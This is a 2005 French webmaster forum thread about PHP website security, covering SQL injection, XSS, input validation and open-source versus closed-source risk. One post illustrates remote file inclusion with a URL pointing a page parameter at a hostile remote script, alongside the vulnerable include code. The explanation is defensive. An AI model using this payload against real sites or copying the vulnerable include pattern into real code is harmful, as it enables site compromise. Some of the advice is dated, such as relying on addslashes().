Formation Google AnalyticsSavez-vous bien utiliser les outils de mesure d'audience ?
Effectuez-vous un calcul de ROI (Retour sur investissement) pour savoir comment améliorer vos campagnes emarketing ?
Savez-vous utiliser les bons outils pour booster votre taux de transformation ?
La formation Web Analytics de Ranking Metrics, présentée par un expert reconnu officiellement par Google Analytics, vous apportera les réponses à toutes vos questions !
===> Informations et inscriptions.

Vulnérabilité d'un site web

Aller à la page 1, 2  Suivante
Poster un nouveau sujet Imprimer cette discussion    Forum -> Développement d'un site Web   Les dernières discussions de ce forum sont disponibles au format RSS
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
 
comparef
WRInaute impliqué
WRInaute impliqué

Inscrit le: 05 Avr 2005
Messages: 497
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 17:02    Sujet du message: Vulnérabilité d'un site web
Quelques petites questions concernant la vulnérabilité d'un site face au piratage.
Quel sont a votre avis les principaux points faibles du php en terme de sécurité.
(par exemple les fonctions avec lesquelles il faut faire particulierement attention)

Je ne connais pas bien le javascript, ce langage peut-il aussi comporter des risques ?

Quel est le meilleur moyen pour protéger les informations de connection a la base de donnée ou autres informations sensibles ?

Merci d'avance pour vos reponses,
R
 
comparef Visiter le site web du posteur
Photoshop user
WRInaute accro
WRInaute accro

Inscrit le: 08 Déc 2004
Messages: 1025
Localisation: Paris/Bruxelles
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 17:12    Sujet du message: Vulnérabilité d'un site web
demande a ton moteur de recherche favoris des informations sur
- SQL Injection/Insertion
- CSS ou XSS ("Cross Site Scripting" et aucun rapport avec "Cascading Style Sheets")
 
Photoshop user Visiter le site web du posteur
CaYuS
WRInaute passionné
WRInaute passionné

Inscrit le: 14 Juil 2005
Messages: 601
Localisation: Paris
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 17:34    Sujet du message: Vulnérabilité d'un site web
De manière générale, toute donnée venant de l'extérieure est potentiellement vérolée. Donc il faut faire attention à chaque formulaire du site, qu'il soit destiné à envoyer des données en SQL, à uploader un fichier etc...
Faire attention à tes fichiers de configuration aussi, les documents qui contiennent des données "secretes" ...
Beaucoup de chose à dire !

Pour faire plaisir à fbparis, je te conseille de lire le très bon dossier sur "La sécurité du Web dynamique" de John Gallet Wink
http://www.saphirtech.com/securite.html
 
CaYuS Visiter le site web du posteur
e-kiwi
Modérateur
Modérateur

Inscrit le: 23 Déc 2003
Messages: 12363
Localisation: Toulouse
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 17:36    Sujet du message: Vulnérabilité d'un site web
eux qui se font pirater sont ceux qui utilisent des projets open source (phpBB, phpnuke, ...)
 
e-kiwi Visiter le site web du posteur
shrom
WRInaute passionné
WRInaute passionné

Inscrit le: 05 Juil 2004
Messages: 866
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 17:47    Sujet du message: Vulnérabilité d'un site web
e-kiwi a écrit:
eux qui se font pirater sont ceux qui utilisent des projets open source (phpBB, phpnuke, ...)


Correction: ceux qui se font pirater sont ceux qui utilisent des scripts codés avec les pieds ( phpBB, phpNuke ... )

De gros sites n'utilisant pas d'open source se font pirater.

Tout le monde se souvient de l'affaire TATI qui permettait de consulter les numéros de carte bancaires des clients et ce malgré la publication de la faille sur Internet, Pourtant ce site fut développé par une grande SSII à laquelle on fait confiance chaque jour en payant par carte bancaire dans les commerces ou sur les sites web.

L'avantage de l'open source est qu'on est averti d'un potentiel trou de sécu et qu'il est en général corrigé rapidement. Ce qui est rarement le cas avec le closed source.
 
shrom Visiter le site web du posteur
comparef
WRInaute impliqué
WRInaute impliqué

Inscrit le: 05 Avr 2005
Messages: 497
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 19:46    Sujet du message: Vulnérabilité d'un site web
Merci pour vos reponses,

CaYuS, ta doc a l'aire tres complete, je vais lire cela avec attention...

a bientot,

R
 
comparef Visiter le site web du posteur
squawk
WRInaute accro
WRInaute accro

Inscrit le: 22 Mar 2004
Messages: 5985
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 21:18    Sujet du message: Vulnérabilité d'un site web
Citation:
e-kiwi a écrit:
eux qui se font pirater sont ceux qui utilisent des projets open source (phpBB, phpnuke, ...)


Correction: ceux qui se font pirater sont ceux qui utilisent des scripts codés avec les pieds ( phpBB, phpNuke ... )


Je crois que tous les sites sont vulnérables... mais ceux dont le code source est disponible comme phpbb le sont pour cette raison (et aussi parcequ'ils sont très répandus) mais certainement pas parcequ'ils sont mal codé...
 
squawk
[--Eric--]
WRInaute impliqué
WRInaute impliqué

Inscrit le: 06 Jan 2004
Messages: 393
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 22:22    Sujet du message: Vulnérabilité d'un site web
squawk a écrit:

Je crois que tous les sites sont vulnérables... mais ceux dont le code source est disponible comme phpbb le sont pour cette raison (et aussi parcequ'ils sont très répandus) mais certainement pas parcequ'ils sont mal codé...


Tout à fait. Tous les scripts dispos sur le net ont des failles régulièrement mises à jour, simplement car le code est disponible donc on peut s'amuser à les chercher.
Vaut mieux par exemple un annuaire codé avec les pieds "maison" mais dont le code n'est pas disponible plutôt qu'un script téléchargé.

a+

Eric
/Codeur avec les pieds/
 
[--Eric--]
appollo
WRInaute occasionnel
WRInaute occasionnel

Inscrit le: 13 Sep 2004
Messages: 130
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 23:14    Sujet du message: Vulnérabilité d'un site web
Il faut surtout arréter la parano selon moi
 
appollo Visiter le site web du posteur
CaYuS
WRInaute passionné
WRInaute passionné

Inscrit le: 14 Juil 2005
Messages: 601
Localisation: Paris
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 23:39    Sujet du message: Vulnérabilité d'un site web
Editié par CaYuS - vu en privé, merci.

Dernière édition par CaYuS le Mar Aoû 30, 2005 23:44; édité 1 fois
 
CaYuS Visiter le site web du posteur
shrom
WRInaute passionné
WRInaute passionné

Inscrit le: 05 Juil 2004
Messages: 866
URL permanente de ce messagePosté le : Mar Aoû 30, 2005 23:39    Sujet du message: Vulnérabilité d'un site web
[--Eric--] a écrit:
Vaut mieux par exemple un annuaire codé avec les pieds "maison" mais dont le code n'est pas disponible plutôt qu'un script téléchargé.


La sécurité par l'obscurité n'a jamais été une bonne méthode de protection, on s'en rend bien compte avec des softs closed source dont l'insécurité n'est plus à prouver. Il y a des méthodes de détection de failles sur des softs ou scripts sans avoir besoin d'avoir le code source.
 
shrom Visiter le site web du posteur
Photoshop user
WRInaute accro
WRInaute accro

Inscrit le: 08 Déc 2004
Messages: 1025
Localisation: Paris/Bruxelles
URL permanente de ce messagePosté le : Mer Aoû 31, 2005 10:54    Sujet du message: Vulnérabilité d'un site web
Même avis que shrom

Les scripts open source sont les plus sur car justement tous le monde a les sources. Le tout est de rester au courant. désactivier le site si besoin dés que la faille est découverte et patché dés que la faille est corrigée.

En plus toutes les failles les plus classiques, celles accéssibles par exemple aux gens dont la sécurité informatique logiciel n'est pas le métier seront a coup sur découverte déjà
 
Photoshop user Visiter le site web du posteur
aladdin
WRInaute passionné
WRInaute passionné

Inscrit le: 29 Avr 2005
Messages: 743
URL permanente de ce messagePosté le : Mer Aoû 31, 2005 15:08    Sujet du message: Vulnérabilité d'un site web
je n'entretai pas dans le débat pour ou contre l'opensource car la situation n'est plus à justifier : il sont nettement meilleurs que les logiciels fermés (payants ou pas)

en cequi concerne les failles d'un site il y'a un type de fonctions qu'il faut particulièrement surveiller : celles qui lisent le contenu d'un fichier comme fopen, include, require ...etc

et surtout les includes car c'est la principales source de problèmes dans les sites amateurs
avec un peut d'attention vous trouverai pleins de sites qui utilisent des url du genre -http://index.php?page=main.php or ceci peut facilement etre remplacé par -http://index.php?page=h*tp//www.hax0r.box.sk/destroy.php
si dans le code php on utilise un truc du genre <?include $page?> ... je vous laisse deviner la suite Wink
pour l'anecdot : il y'a meme pas un mois j'ai renseigné un site d'un grand MMORPG commercial sur des failles de ce genre dans ces url, et le webmaster les a corrigé en enlevant le .php des noms de pages (se qui ne change rien), j'ai du le recontacter et lui ai envoyer le code qu'il fallait ajouter pour éviter cela ...

il y'a aussi les formulaires à surveiller : toutes les donnée provenant d'un post ou d'un get sont potentiellement dangereuses , il faut donc penser à htmlentities(), addslashes(), strip_tages() ....etc

et finalement il ne faut pas oublier l'injection SQL si vous utilisez les bases de données, et pour ceci j'avai posté sur ce forum un code génerique qui permet d'éviter la plupart des attaques de ce genre
 
aladdin Visiter le site web du posteur
shrom
WRInaute passionné
WRInaute passionné

Inscrit le: 05 Juil 2004
Messages: 866
URL permanente de ce messagePosté le : Mer Aoû 31, 2005 16:14    Sujet du message: Vulnérabilité d'un site web
aladdin a écrit:
il y'a aussi les formulaires à surveiller : toutes les donnée provenant d'un post ou d'un get sont potentiellement dangereuses , il faut donc penser à htmlentities(), addslashes(), strip_tages() ....etc


J'irais même plus loin, toutes les données sont potentiellement dangereuses, qu'elles viennent de $_GET, $_POST, $_REQUEST, $_COOKIE ...

Il faut toujours s'assurer qu'une variable est cohérente par rapport à ce qu'on attend avant de l'utiliser, si cette variable n'est pas cohérente, il faut renvoyer un message d'erreur au visiteur.

Exemple: http://monsite/index.php?id=123&mode=view
Code:
$valid_modes = array( 'view','edit' );
$id = (int) $_GET['id'];
if( empty( $id ) ) {
  die('Une erreur est survenue.');
}
$mode = $_GET['mode'];
if( ! in_array( $mode, $valid_modes ) ) {
  die('Une erreur est survenue.');
}


Les fonction ctype_* sont très utiles dans ce genre de cas
 
shrom Visiter le site web du posteur
comparef
WRInaute impliqué
WRInaute impliqué

Inscrit le: 05 Avr 2005
Messages: 497
URL permanente de ce messagePosté le : Mer Aoû 31, 2005 19:18    Sujet du message: Vulnérabilité d'un site web
Oui, c'est ce que j'ai fai ajourd'hui dans mes sites, partout (ou presque) ou il y a une variable transmise par l'URL, avant tout traitement ou toute utilisation de cette variable, je fait une verification et si la variable est incohérante : déconnection SQL; echo "erreur de transmition de données"; exit;

Au sujet des rapports d'erreurs php, lorsqu'il y a une erreur, ce rapport affiche la page ou il y a eu cette erreur,avec le numéro de la ligne, type d'erreur, et avec l'arboréssence précise du site depuis sa racine (du genre home/web/www/etc/mapage.php).
Est ce que la connaissance précise de cette arboressance peut etre exploitée par un hacker pour nuire au site ?

J'ai lu que error_reporting(0); bloquai ces rapports d'erreur, mais j'ai essayé et les rapports sont toujours affichés.
 
comparef Visiter le site web du posteur
 
Montrer les messages depuis:   
Revenir en haut    Forum -> Développement d'un site Web Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 2 - Aller à la page 1, 2  Suivante
Connexion
Nom d'utilisateur:    Mot de passe:      Se connecter automatiquement à chaque visite    

CLIQUEZ ICI pour vous inscrire à WebRankInfo (forum, annuaire, outils...)

Connexion

© 2001-2005 phpBB Group, support français
Personnalisation : WebRankInfo ™

 ODP  Firefox  Alsacreations  annuaire webmaster Yagoort